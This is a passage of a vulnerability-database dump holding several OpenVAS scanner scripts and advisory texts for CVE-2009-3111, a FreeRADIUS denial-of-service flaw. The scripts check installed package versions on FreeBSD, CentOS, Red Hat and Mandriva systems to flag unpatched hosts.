are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66614\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880824", "type": "openvas", "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880824\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'freeradius'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"freeradius on CentOS 5\");\n script_tag(name:\"insight\", value:\"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized 
authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n\n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, radiusd will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-04-06T11:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service 
(RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2018-04-06T00:00:00", "published": "2009-09-21T00:00:00", "id": "OPENVAS:136141256231064905", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064905", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1451", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64905\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-03-21T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:66614", "href": 
"http://plugins.openvas.org/nasl.php?oid=66614", "type": "openvas", "title": "FreeBSD Ports: freeradius", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. 
NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66614);\n script_version(\"$Revision: 5656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-21 12:03:12 +0100 (Tue, 21 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:04:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2018-01-17T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:1361412562310830798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830798", "type": "openvas", "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830798\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for 
the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", 
rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.", "modified": "2018-04-06T00:00:00", 
"published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066166", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066166", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66166\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) 
$\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates to 
freeradius announced in\nadvisory CESA-2009:1451.", "modified": "2017-07-10T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66166", "href": "http://plugins.openvas.org/nasl.php?oid=66166", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
